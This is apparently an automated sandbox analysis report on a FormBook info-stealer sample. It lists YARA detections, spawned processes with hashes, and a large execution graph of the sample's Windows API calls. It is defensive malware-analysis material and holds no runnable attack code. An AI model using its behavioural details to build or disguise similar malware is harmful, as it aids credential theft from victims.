                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:07:01:31
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe"
                                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:07:01:44
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                Imagebase:0x7ff7b4cb0000
                                                                                                                                                                File size:675'744 bytes
                                                                                                                                                                MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:8.8%
Total number of Nodes:2000
Total number of Limit Nodes:35
execution_graph: [interactive graph data, not reproduced here: a node list of 2000 nodes, each a code address in the sample's image annotated with the Windows APIs it calls, joined by control-flow edges]
86744->86745 86746 44afef GetSystemTimeAsFileTime 86745->86746 86747 452a00 86746->86747 86748 452a36 86747->86748 86749 452a13 86747->86749 86750 452aa5 86748->86750 86751 452a3c 86748->86751 86752 413748 46 API calls 86749->86752 86754 413748 46 API calls 86750->86754 87311 44b1a9 86751->87311 86755 452a1c 86752->86755 86758 452aa3 86754->86758 86756 413748 46 API calls 86755->86756 86759 452a25 86756->86759 86757 452a9d 86760 413748 46 API calls 86757->86760 86758->86645 86759->86645 86760->86758 86762 431e64 86761->86762 86764 431e6a 86761->86764 86763 414a46 82 API calls 86762->86763 86763->86764 86764->86646 86766 425de2 86765->86766 86767 40f6fc 86765->86767 86766->86707 86768 40f710 WideCharToMultiByte 86767->86768 86769 40f756 86768->86769 86770 40f728 86768->86770 86769->86707 86771 4115d7 52 API calls 86770->86771 86772 40f735 WideCharToMultiByte 86771->86772 86772->86707 86775 40f85d 86773->86775 86776 40f7ab 86775->86776 86821 414db8 86775->86821 86777 4149c2 86776->86777 86833 414904 86777->86833 86779 40f7e9 86779->86712 86780 40f5c0 86779->86780 86785 40f5cd 86780->86785 86781 414d04 61 API calls 86781->86785 86783 425d11 86784 4150d1 81 API calls 86783->86784 86786 425d33 86784->86786 86785->86781 86785->86783 86788 40f691 86785->86788 86921 4150d1 86785->86921 86787 414d04 61 API calls 86786->86787 86787->86788 86788->86714 86790 414a52 86789->86790 86791 414a64 86790->86791 86792 414a79 86790->86792 87061 417f77 46 API calls 86791->87061 86794 415471 47 API calls 86792->86794 86796 414a74 86792->86796 86797 414a92 86794->86797 86795 414a69 87062 417f25 10 API calls 86795->87062 86796->86719 87045 4149d9 86797->87045 87130 414c76 86802->87130 86804 414d1c 86805 44afef 86804->86805 87298 442c5a 86805->87298 86807 44b00d 86807->86721 86809 414fee 86808->86809 86810 414ffa 86809->86810 86811 41500f 86809->86811 87302 417f77 46 API calls 86810->87302 86813 415471 47 API calls 86811->86813 86815 415017 86813->86815 86814 414fff 87303 417f25 10 API 
calls 86814->87303 86817 414e4e 51 API calls 86815->86817 86818 415024 86817->86818 87304 41503d LeaveCriticalSection LeaveCriticalSection 86818->87304 86820 41500a 86820->86723 86822 414dd6 86821->86822 86823 414deb 86821->86823 86830 417f77 46 API calls 86822->86830 86823->86822 86825 414df2 86823->86825 86829 414de6 86825->86829 86832 418f98 77 API calls 86825->86832 86826 414ddb 86831 417f25 10 API calls 86826->86831 86829->86775 86830->86826 86831->86829 86832->86829 86836 414910 86833->86836 86834 414923 86889 417f77 46 API calls 86834->86889 86836->86834 86838 414951 86836->86838 86837 414928 86890 417f25 10 API calls 86837->86890 86852 41d4d1 86838->86852 86841 414956 86842 41496a 86841->86842 86843 41495d 86841->86843 86844 414992 86842->86844 86845 414972 86842->86845 86891 417f77 46 API calls 86843->86891 86869 41d218 86844->86869 86892 417f77 46 API calls 86845->86892 86849 414933 86849->86779 86853 41d4dd 86852->86853 86854 4182cb 46 API calls 86853->86854 86867 41d4eb 86854->86867 86855 41d560 86894 41d5fb 86855->86894 86856 41d567 86858 416b04 46 API calls 86856->86858 86860 41d56e 86858->86860 86859 41d5f0 86859->86841 86860->86855 86861 41d57c InitializeCriticalSectionAndSpinCount 86860->86861 86862 41d59c 86861->86862 86863 41d5af EnterCriticalSection 86861->86863 86866 413748 46 API calls 86862->86866 86863->86855 86864 418209 46 API calls 86864->86867 86866->86855 86867->86855 86867->86856 86867->86864 86897 4154b2 47 API calls 86867->86897 86898 415520 LeaveCriticalSection LeaveCriticalSection 86867->86898 86870 41d23a 86869->86870 86871 41d255 86870->86871 86883 41d26c 86870->86883 86903 417f77 46 API calls 86871->86903 86872 41d421 86875 41d47a 86872->86875 86876 41d48c 86872->86876 86874 41d25a 86904 417f25 10 API calls 86874->86904 86908 417f77 46 API calls 86875->86908 86900 422bf9 86876->86900 86880 41d47f 86909 417f25 10 API calls 86880->86909 86881 41499d 86893 4149b8 LeaveCriticalSection LeaveCriticalSection 86881->86893 86883->86872 
86883->86875 86905 41341f 58 API calls 86883->86905 86885 41d41a 86885->86872 86906 41341f 58 API calls 86885->86906 86887 41d439 86887->86872 86907 41341f 58 API calls 86887->86907 86889->86837 86890->86849 86891->86849 86892->86849 86893->86849 86899 4181f2 LeaveCriticalSection 86894->86899 86896 41d602 86896->86859 86897->86867 86898->86867 86899->86896 86910 422b35 86900->86910 86902 422c14 86902->86881 86903->86874 86904->86881 86905->86885 86906->86887 86907->86872 86908->86880 86909->86881 86912 422b41 86910->86912 86911 422b54 86913 417f77 46 API calls 86911->86913 86912->86911 86914 422b8a 86912->86914 86915 422b59 86913->86915 86917 422400 109 API calls 86914->86917 86916 417f25 10 API calls 86915->86916 86920 422b63 86916->86920 86918 422ba4 86917->86918 86919 422bcb LeaveCriticalSection 86918->86919 86919->86920 86920->86902 86922 4150dd 86921->86922 86923 4150e9 86922->86923 86925 41510f 86922->86925 86952 417f77 46 API calls 86923->86952 86934 415471 86925->86934 86926 4150ee 86953 417f25 10 API calls 86926->86953 86933 4150f9 86933->86785 86935 415483 86934->86935 86936 4154a5 EnterCriticalSection 86934->86936 86935->86936 86937 41548b 86935->86937 86938 415117 86936->86938 86939 4182cb 46 API calls 86937->86939 86940 415047 86938->86940 86939->86938 86941 415067 86940->86941 86942 415057 86940->86942 86947 415079 86941->86947 86955 414e4e 86941->86955 87010 417f77 46 API calls 86942->87010 86946 41505c 86954 415143 LeaveCriticalSection LeaveCriticalSection 86946->86954 86972 41443c 86947->86972 86950 4150b9 86985 41e1f4 86950->86985 86952->86926 86953->86933 86954->86933 86956 414e61 86955->86956 86957 414e79 86955->86957 87011 417f77 46 API calls 86956->87011 86959 414139 46 API calls 86957->86959 86961 414e80 86959->86961 86960 414e66 87012 417f25 10 API calls 86960->87012 86963 41e1f4 51 API calls 86961->86963 86964 414e97 86963->86964 86965 414f09 86964->86965 86967 414ec9 86964->86967 86971 414e71 86964->86971 87013 417f77 46 API calls 
86965->87013 86968 41e1f4 51 API calls 86967->86968 86967->86971 86969 414f64 86968->86969 86970 41e1f4 51 API calls 86969->86970 86969->86971 86970->86971 86971->86947 86973 414455 86972->86973 86977 414477 86972->86977 86974 414139 46 API calls 86973->86974 86973->86977 86975 414470 86974->86975 87014 41b7b2 77 API calls 86975->87014 86978 414139 86977->86978 86979 414145 86978->86979 86980 41415a 86978->86980 87015 417f77 46 API calls 86979->87015 86980->86950 86982 41414a 87016 417f25 10 API calls 86982->87016 86984 414155 86984->86950 86986 41e200 86985->86986 86987 41e223 86986->86987 86988 41e208 86986->86988 86989 41e22f 86987->86989 86994 41e269 86987->86994 87037 417f8a 46 API calls 86988->87037 87039 417f8a 46 API calls 86989->87039 86992 41e20d 87038 417f77 46 API calls 86992->87038 86993 41e234 87040 417f77 46 API calls 86993->87040 87017 41ae56 86994->87017 86998 41e23c 87041 417f25 10 API calls 86998->87041 86999 41e26f 87001 41e291 86999->87001 87002 41e27d 86999->87002 87042 417f77 46 API calls 87001->87042 87027 41e17f 87002->87027 87005 41e215 87005->86946 87006 41e289 87044 41e2c0 LeaveCriticalSection 87006->87044 87007 41e296 87043 417f8a 46 API calls 87007->87043 87010->86946 87011->86960 87012->86971 87013->86971 87014->86977 87015->86982 87016->86984 87018 41ae62 87017->87018 87019 41aebc 87018->87019 87021 4182cb 46 API calls 87018->87021 87020 41aec1 EnterCriticalSection 87019->87020 87022 41aede 87019->87022 87020->87022 87023 41ae8e 87021->87023 87022->86999 87024 41aeaa 87023->87024 87025 41ae97 InitializeCriticalSectionAndSpinCount 87023->87025 87026 41aeec LeaveCriticalSection 87024->87026 87025->87024 87026->87019 87028 41aded 46 API calls 87027->87028 87029 41e18e 87028->87029 87030 41e1a4 SetFilePointer 87029->87030 87031 41e194 87029->87031 87033 41e1c3 87030->87033 87034 41e1bb GetLastError 87030->87034 87032 417f77 46 API calls 87031->87032 87035 41e199 87032->87035 87033->87035 87036 417f9d 46 API calls 87033->87036 
87034->87033 87035->87006 87036->87035 87037->86992 87038->87005 87039->86993 87040->86998 87041->87005 87042->87007 87043->87006 87044->87005 87046 4149ea 87045->87046 87047 4149fe 87045->87047 87091 417f77 46 API calls 87046->87091 87049 4149fa 87047->87049 87051 41443c 77 API calls 87047->87051 87063 414ab2 LeaveCriticalSection LeaveCriticalSection 87049->87063 87050 4149ef 87092 417f25 10 API calls 87050->87092 87053 414a0a 87051->87053 87064 41d8c2 87053->87064 87056 414139 46 API calls 87057 414a18 87056->87057 87068 41d7fe 87057->87068 87059 414a1e 87059->87049 87060 413748 46 API calls 87059->87060 87060->87049 87061->86795 87062->86796 87063->86796 87065 414a12 87064->87065 87066 41d8d2 87064->87066 87065->87056 87066->87065 87067 413748 46 API calls 87066->87067 87067->87065 87069 41d80a 87068->87069 87070 41d812 87069->87070 87071 41d82d 87069->87071 87108 417f8a 46 API calls 87070->87108 87073 41d839 87071->87073 87076 41d873 87071->87076 87110 417f8a 46 API calls 87073->87110 87074 41d817 87109 417f77 46 API calls 87074->87109 87079 41ae56 48 API calls 87076->87079 87078 41d83e 87111 417f77 46 API calls 87078->87111 87082 41d879 87079->87082 87080 41d81f 87080->87059 87085 41d893 87082->87085 87086 41d887 87082->87086 87083 41d846 87112 417f25 10 API calls 87083->87112 87113 417f77 46 API calls 87085->87113 87093 41d762 87086->87093 87089 41d88d 87114 41d8ba LeaveCriticalSection 87089->87114 87091->87050 87092->87049 87115 41aded 87093->87115 87095 41d7c8 87128 41ad67 47 API calls 87095->87128 87097 41d772 87097->87095 87098 41aded 46 API calls 87097->87098 87106 41d7a6 87097->87106 87101 41d79d 87098->87101 87099 41aded 46 API calls 87102 41d7b2 CloseHandle 87099->87102 87100 41d7d0 87107 41d7f2 87100->87107 87129 417f9d 46 API calls 87100->87129 87103 41aded 46 API calls 87101->87103 87102->87095 87104 41d7be GetLastError 87102->87104 87103->87106 87104->87095 87106->87095 87106->87099 87107->87089 87108->87074 87109->87080 87110->87078 87111->87083 
87112->87080 87113->87089 87114->87080 87116 41ae12 87115->87116 87117 41adfa 87115->87117 87120 417f8a 46 API calls 87116->87120 87122 41ae51 87116->87122 87118 417f8a 46 API calls 87117->87118 87119 41adff 87118->87119 87123 417f77 46 API calls 87119->87123 87121 41ae23 87120->87121 87124 417f77 46 API calls 87121->87124 87122->87097 87125 41ae07 87123->87125 87126 41ae2b 87124->87126 87125->87097 87127 417f25 10 API calls 87126->87127 87127->87125 87128->87100 87129->87107 87131 414c82 87130->87131 87132 414cc3 87131->87132 87133 414c96 87131->87133 87134 414cbb 87131->87134 87135 415471 47 API calls 87132->87135 87157 417f77 46 API calls 87133->87157 87134->86804 87136 414ccb 87135->87136 87143 414aba 87136->87143 87139 414cb0 87158 417f25 10 API calls 87139->87158 87147 414ad8 87143->87147 87150 414af2 87143->87150 87144 414ae2 87210 417f77 46 API calls 87144->87210 87146 414b2d 87146->87150 87151 414c38 87146->87151 87153 414139 46 API calls 87146->87153 87160 41dfcc 87146->87160 87190 41d8f3 87146->87190 87212 41e0c2 46 API calls 87146->87212 87147->87144 87147->87146 87147->87150 87159 414cfa LeaveCriticalSection LeaveCriticalSection 87150->87159 87213 417f77 46 API calls 87151->87213 87153->87146 87156 414ae7 87211 417f25 10 API calls 87156->87211 87157->87139 87158->87134 87159->87134 87161 41dfd8 87160->87161 87162 41dfe0 87161->87162 87163 41dffb 87161->87163 87283 417f8a 46 API calls 87162->87283 87165 41e007 87163->87165 87168 41e041 87163->87168 87285 417f8a 46 API calls 87165->87285 87166 41dfe5 87284 417f77 46 API calls 87166->87284 87172 41e063 87168->87172 87173 41e04e 87168->87173 87170 41e00c 87286 417f77 46 API calls 87170->87286 87175 41ae56 48 API calls 87172->87175 87288 417f8a 46 API calls 87173->87288 87179 41e069 87175->87179 87176 41e014 87287 417f25 10 API calls 87176->87287 87177 41e053 87289 417f77 46 API calls 87177->87289 87178 41dfed 87178->87146 87182 41e077 87179->87182 87183 41e08b 87179->87183 87214 41da15 87182->87214 87290 
417f77 46 API calls 87183->87290 87186 41e083 87292 41e0ba LeaveCriticalSection 87186->87292 87187 41e090 87291 417f8a 46 API calls 87187->87291 87191 41d900 87190->87191 87195 41d915 87190->87195 87296 417f77 46 API calls 87191->87296 87193 41d905 87297 417f25 10 API calls 87193->87297 87196 41d94a 87195->87196 87202 41d910 87195->87202 87293 420603 87195->87293 87198 414139 46 API calls 87196->87198 87199 41d95e 87198->87199 87200 41dfcc 59 API calls 87199->87200 87201 41d965 87200->87201 87201->87202 87203 414139 46 API calls 87201->87203 87202->87146 87204 41d988 87203->87204 87204->87202 87205 414139 46 API calls 87204->87205 87206 41d994 87205->87206 87206->87202 87207 414139 46 API calls 87206->87207 87208 41d9a1 87207->87208 87209 414139 46 API calls 87208->87209 87209->87202 87210->87156 87211->87150 87212->87146 87213->87156 87215 41da31 87214->87215 87216 41da4c 87214->87216 87217 417f8a 46 API calls 87215->87217 87218 41da5b 87216->87218 87221 41da7a 87216->87221 87220 41da36 87217->87220 87219 417f8a 46 API calls 87218->87219 87222 41da60 87219->87222 87224 417f77 46 API calls 87220->87224 87223 41da98 87221->87223 87235 41daac 87221->87235 87225 417f77 46 API calls 87222->87225 87226 417f8a 46 API calls 87223->87226 87227 41da3e 87224->87227 87229 41da67 87225->87229 87231 41da9d 87226->87231 87227->87186 87228 41db02 87230 417f8a 46 API calls 87228->87230 87232 417f25 10 API calls 87229->87232 87233 41db07 87230->87233 87234 417f77 46 API calls 87231->87234 87232->87227 87236 417f77 46 API calls 87233->87236 87237 41daa4 87234->87237 87235->87227 87235->87228 87238 41dae1 87235->87238 87239 41db1b 87235->87239 87236->87237 87240 417f25 10 API calls 87237->87240 87238->87228 87246 41daec ReadFile 87238->87246 87241 416b04 46 API calls 87239->87241 87240->87227 87243 41db31 87241->87243 87249 41db59 87243->87249 87250 41db3b 87243->87250 87244 41dc17 87245 41df8f GetLastError 87244->87245 87253 41dc2b 87244->87253 87247 41de16 87245->87247 87248 41df9c 
87245->87248 87246->87244 87246->87245 87257 417f9d 46 API calls 87247->87257 87262 41dd9b 87247->87262 87251 417f77 46 API calls 87248->87251 87254 420494 48 API calls 87249->87254 87252 417f77 46 API calls 87250->87252 87255 41dfa1 87251->87255 87256 41db40 87252->87256 87253->87262 87263 41dc47 87253->87263 87266 41de5b 87253->87266 87258 41db67 87254->87258 87259 417f8a 46 API calls 87255->87259 87260 417f8a 46 API calls 87256->87260 87257->87262 87258->87246 87259->87262 87260->87227 87261 413748 46 API calls 87261->87227 87262->87227 87262->87261 87264 41dcab ReadFile 87263->87264 87271 41dd28 87263->87271 87267 41dcc9 GetLastError 87264->87267 87276 41dcd3 87264->87276 87265 41ded0 ReadFile 87268 41deef GetLastError 87265->87268 87274 41def9 87265->87274 87266->87262 87266->87265 87267->87263 87267->87276 87268->87266 87268->87274 87269 41ddec MultiByteToWideChar 87269->87262 87270 41de10 GetLastError 87269->87270 87270->87247 87271->87262 87272 41dda3 87271->87272 87273 41dd96 87271->87273 87279 41dd60 87271->87279 87272->87279 87280 41ddda 87272->87280 87275 417f77 46 API calls 87273->87275 87274->87266 87278 420494 48 API calls 87274->87278 87275->87262 87276->87263 87277 420494 48 API calls 87276->87277 87277->87276 87278->87274 87279->87269 87281 420494 48 API calls 87280->87281 87282 41dde9 87281->87282 87282->87269 87283->87166 87284->87178 87285->87170 87286->87176 87287->87178 87288->87177 87289->87176 87290->87187 87291->87186 87292->87178 87294 416b04 46 API calls 87293->87294 87295 420618 87294->87295 87295->87196 87296->87193 87297->87202 87301 4148b3 GetSystemTimeAsFileTime 87298->87301 87300 442c6b 87300->86807 87301->87300 87302->86814 87303->86820 87304->86820 87310 45272f 87305->87310 87306 414d04 61 API calls 87306->87310 87307 44afef GetSystemTimeAsFileTime 87307->87310 87308 4528a4 87308->86729 87308->86730 87309 4150d1 81 API calls 87309->87310 87310->87306 87310->87307 87310->87308 87310->87309 87312 44b1bc 87311->87312 87313 44b1ca 
87311->87313 87314 4149c2 116 API calls 87312->87314 87315 44b1e1 87313->87315 87316 4149c2 116 API calls 87313->87316 87317 44b1d8 87313->87317 87314->87313 87346 4321a4 87315->87346 87318 44b2db 87316->87318 87317->86757 87318->87315 87320 44b2e9 87318->87320 87322 44b2f6 87320->87322 87325 414a46 82 API calls 87320->87325 87321 44b224 87323 44b253 87321->87323 87324 44b228 87321->87324 87322->86757 87350 43213d 87323->87350 87327 44b235 87324->87327 87330 414a46 82 API calls 87324->87330 87325->87322 87328 44b245 87327->87328 87331 414a46 82 API calls 87327->87331 87328->86757 87329 44b25a 87332 44b260 87329->87332 87333 44b289 87329->87333 87330->87327 87331->87328 87335 44b26d 87332->87335 87337 414a46 82 API calls 87332->87337 87360 44b0bf 87 API calls 87333->87360 87338 44b27d 87335->87338 87340 414a46 82 API calls 87335->87340 87336 44b28f 87361 4320f8 46 API calls 87336->87361 87337->87335 87338->86757 87340->87338 87341 44b295 87342 44b2a2 87341->87342 87343 414a46 82 API calls 87341->87343 87344 44b2b2 87342->87344 87345 414a46 82 API calls 87342->87345 87343->87342 87344->86757 87345->87344 87347 4321b4 87346->87347 87348 4321cb 87346->87348 87347->87321 87349 414d04 61 API calls 87348->87349 87349->87347 87351 4135bb 46 API calls 87350->87351 87352 432150 87351->87352 87353 4135bb 46 API calls 87352->87353 87354 432162 87353->87354 87355 4135bb 46 API calls 87354->87355 87356 432174 87355->87356 87358 432189 87356->87358 87362 4320f8 46 API calls 87356->87362 87358->87329 87359 432198 87359->87329 87360->87336 87361->87341 87362->87359 87363->86659 87364->86661 87365->86680 87366->86680 87367->86680 87368->86671 87369->86680 87370->86680 87371->86684 87372->86693 87373->86695 87374->86695 87424 410160 87375->87424 87377 41012f GetFullPathNameW 87378 410147 87377->87378 87378->86515 87380 4102cb SHGetDesktopFolder 87379->87380 87382 410333 87379->87382 87381 4102e0 87380->87381 87380->87382 87381->87382 87383 41031c SHGetPathFromIDListW 87381->87383 
87382->86518 87383->87382 87385 4101bb 87384->87385 87390 425f4a 87384->87390 87386 410160 52 API calls 87385->87386 87387 4101c7 87386->87387 87428 410200 52 API calls 87387->87428 87388 4114ab 58 API calls 87388->87390 87390->87388 87393 425f6e 87390->87393 87391 4101d6 87429 410200 52 API calls 87391->87429 87393->86520 87394 4101e9 87394->86520 87396 40f760 126 API calls 87395->87396 87397 40f584 87396->87397 87398 429335 87397->87398 87399 40f58c 87397->87399 87402 4528bd 118 API calls 87398->87402 87400 40f598 87399->87400 87401 429358 87399->87401 87454 4033c0 113 API calls 87400->87454 87455 434034 86 API calls 87401->87455 87405 42934b 87402->87405 87408 429373 87405->87408 87409 42934f 87405->87409 87406 429369 87406->87408 87407 40f5b4 87407->86516 87411 4115d7 52 API calls 87408->87411 87410 431e58 82 API calls 87409->87410 87410->87401 87423 4293c5 87411->87423 87412 42959c 87413 413748 46 API calls 87412->87413 87414 4295a5 87413->87414 87415 431e58 82 API calls 87414->87415 87416 4295b1 87415->87416 87420 401b10 52 API calls 87420->87423 87423->87412 87423->87420 87430 444af8 87423->87430 87433 44b41c 87423->87433 87440 402780 87423->87440 87448 4022d0 87423->87448 87456 44c7dd 64 API calls 87423->87456 87425 410167 87424->87425 87426 4115d7 52 API calls 87425->87426 87427 41017e 87426->87427 87427->87377 87428->87391 87429->87394 87431 4115d7 52 API calls 87430->87431 87432 444b27 87431->87432 87432->87423 87434 44b429 87433->87434 87435 4115d7 52 API calls 87434->87435 87436 44b440 87435->87436 87437 44b45e 87436->87437 87438 401b10 52 API calls 87436->87438 87437->87423 87439 44b453 87438->87439 87439->87423 87441 402827 87440->87441 87444 402790 87440->87444 87443 4115d7 52 API calls 87441->87443 87442 4115d7 52 API calls 87445 402797 87442->87445 87443->87444 87444->87442 87446 4027bd 87445->87446 87447 4115d7 52 API calls 87445->87447 87446->87423 87447->87446 87449 4022e0 87448->87449 87451 40239d 87448->87451 87450 4115d7 52 API calls 
87449->87450 87449->87451 87452 402320 87449->87452 87450->87452 87451->87423 87452->87451 87453 4115d7 52 API calls 87452->87453 87453->87452 87454->87407 87455->87406 87456->87423 87458 402539 87457->87458 87459 402417 87457->87459 87458->86524 87459->87458 87460 4115d7 52 API calls 87459->87460 87461 402443 87460->87461 87462 4115d7 52 API calls 87461->87462 87463 4024b4 87462->87463 87463->87458 87465 4022d0 52 API calls 87463->87465 87486 402880 95 API calls 87463->87486 87465->87463 87470 401566 87466->87470 87467 401794 87487 40e9a0 90 API calls 87467->87487 87470->87467 87471 40167a 87470->87471 87472 4010a0 52 API calls 87470->87472 87473 4017c0 87471->87473 87488 45e737 90 API calls 87471->87488 87472->87470 87473->86526 87475 40bc70 52 API calls 87474->87475 87484 40d451 87475->87484 87476 40d50f 87491 410600 52 API calls 87476->87491 87478 427c01 87492 45e737 90 API calls 87478->87492 87479 40e0a0 52 API calls 87479->87484 87481 40d519 87481->86529 87482 401b10 52 API calls 87482->87484 87484->87476 87484->87478 87484->87479 87484->87481 87484->87482 87489 40f310 53 API calls 87484->87489 87490 40d860 91 API calls 87484->87490 87486->87463 87487->87471 87488->87473 87489->87484 87490->87484 87491->87481 87492->87481 87493->86542 87494->86543 87496 42c5fe 87495->87496 87511 4091c6 87495->87511 87497 40bc70 52 API calls 87496->87497 87496->87511 87498 42c64e InterlockedIncrement 87497->87498 87499 42c665 87498->87499 87504 42c697 87498->87504 87502 42c672 InterlockedDecrement Sleep InterlockedIncrement 87499->87502 87499->87504 87500 42c737 InterlockedDecrement 87501 42c74a 87500->87501 87505 408f40 VariantClear 87501->87505 87502->87499 87502->87504 87503 42c731 87503->87500 87504->87500 87504->87503 87788 408e80 87504->87788 87507 42c752 87505->87507 87797 410c60 VariantClear 87507->87797 87511->86601 87512 42c6db 87513 402160 52 API calls 87512->87513 87514 42c6e5 87513->87514 87793 45340c 85 API calls 87514->87793 87516 42c6f1 87794 40d200 52 API 
calls 87516->87794 87518 42c6fb 87795 465124 53 API calls 87518->87795 87520 42c715 87521 42c76a 87520->87521 87522 42c719 87520->87522 87524 401b10 52 API calls 87521->87524 87796 46fe32 VariantClear 87522->87796 87525 42c77e 87524->87525 87526 401980 53 API calls 87525->87526 87533 42c796 87526->87533 87527 42c812 87799 46fe32 VariantClear 87527->87799 87529 42c82a InterlockedDecrement 87800 46ff07 54 API calls 87529->87800 87531 42c849 87535 42c9ec 87531->87535 87540 408f40 VariantClear 87531->87540 87543 402780 52 API calls 87531->87543 87548 401980 53 API calls 87531->87548 87803 40a780 87531->87803 87532 42c864 87801 45e737 90 API calls 87532->87801 87533->87527 87533->87532 87798 40ba10 52 API calls 87533->87798 87844 47d33e 331 API calls 87535->87844 87538 42c9fe 87845 46feb1 VariantClear VariantClear 87538->87845 87540->87531 87541 42ca08 87544 401b10 52 API calls 87541->87544 87542 408f40 VariantClear 87545 42c891 87542->87545 87543->87531 87546 42ca15 87544->87546 87802 410c60 VariantClear 87545->87802 87549 40c2c0 52 API calls 87546->87549 87548->87531 87550 42c874 87549->87550 87550->87542 87552 42ca59 87550->87552 87552->87552 87554 40afc4 87553->87554 87555 40b156 87553->87555 87556 40afd5 87554->87556 87557 42d1e3 87554->87557 87855 45e737 90 API calls 87555->87855 87562 40a780 194 API calls 87556->87562 87578 40b11a 87556->87578 87856 45e737 90 API calls 87557->87856 87560 42d1f8 87566 408f40 VariantClear 87560->87566 87561 40b143 87561->86601 87564 40b00a 87562->87564 87564->87560 87567 40b012 87564->87567 87565 42d4db 87565->87565 87566->87561 87568 40b04a 87567->87568 87569 42d231 VariantClear 87567->87569 87576 40b094 87567->87576 87572 40b05c 87568->87572 87857 40e270 VariantClear 87568->87857 87569->87572 87570 42d45a VariantClear 87570->87578 87571 40b108 87571->87578 87858 40e270 VariantClear 87571->87858 87574 4115d7 52 API calls 87572->87574 87572->87576 87574->87576 87576->87571 87577 42d425 87576->87577 87577->87570 87577->87578 
87578->87561 87859 45e737 90 API calls 87578->87859 87580 408fff 87579->87580 87584 40900d 87579->87584 87860 403ea0 52 API calls 87580->87860 87583 42c3f6 87863 45e737 90 API calls 87583->87863 87584->87583 87586 42c44a 87584->87586 87587 40a780 194 API calls 87584->87587 87588 42c47b 87584->87588 87592 42c4cb 87584->87592 87593 42c564 87584->87593 87597 42c548 87584->87597 87598 409112 87584->87598 87601 4090df 87584->87601 87603 42c528 87584->87603 87605 4090ea 87584->87605 87613 4090f2 87584->87613 87862 4534e3 52 API calls 87584->87862 87864 40c4e0 194 API calls 87584->87864 87865 45e737 90 API calls 87586->87865 87587->87584 87866 451b42 61 API calls 87588->87866 87868 47faae 233 API calls 87592->87868 87594 408f40 VariantClear 87593->87594 87594->87613 87595 42c491 87595->87613 87867 45e737 90 API calls 87595->87867 87871 45e737 90 API calls 87597->87871 87598->87597 87608 40912b 87598->87608 87599 42c4da 87599->87613 87869 45e737 90 API calls 87599->87869 87601->87605 87606 408e80 VariantClear 87601->87606 87870 45e737 90 API calls 87603->87870 87609 408f40 VariantClear 87605->87609 87606->87605 87608->87613 87861 403e10 53 API calls 87608->87861 87609->87613 87611 40914b 87612 408f40 VariantClear 87611->87612 87612->87613 87613->86601 87872 408d90 87614->87872 87616 429778 87899 410c60 VariantClear 87616->87899 87618 429780 87619 42976c 87898 45e737 90 API calls 87619->87898 87620 408cf9 87620->87616 87620->87619 87622 408d2d 87620->87622 87888 403d10 87622->87888 87625 408d71 87625->86601 87626 408f40 VariantClear 87627 408d45 87626->87627 87627->87625 87627->87626 87629 425c87 87628->87629 87632 40d15f 87628->87632 87630 425cc7 87629->87630 87631 425ca1 TranslateAcceleratorW 87629->87631 87631->87632 87632->86601 87634 42602f 87633->87634 87637 40d17f 87633->87637 87634->86601 87635 40d18c 87635->86601 87636 42608e IsDialogMessageW 87636->87635 87636->87637 87637->87635 87637->87636 88175 430c46 GetClassLongW 87637->88175 87640 4096c6 87639->87640 87641 
Control-flow graph for the function containing the CharUpperBuffW call at 00409753 (graph node 409749); the rendered node/edge list of the graph is not reproduced here. Besides CharUpperBuffW, the graph's nodes reference VariantClear, VariantInit and VariantCopy, GetPEB (node 44034a8) and Sleep (node 44022f1), GetVersionExW, GetSystemInfo, GetNativeSystemInfo, GetCurrentProcess, LoadLibraryA/GetProcAddress, FreeLibrary, GetStdHandle, CreateThread, CloseHandle, CreateFileW, SetFilePointerEx, WriteFile, GetFileAttributesW/FindFirstFileW/FindClose, GetLastError, and RegOpenKeyExW/RegQueryValueExW/RegCloseKey.
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
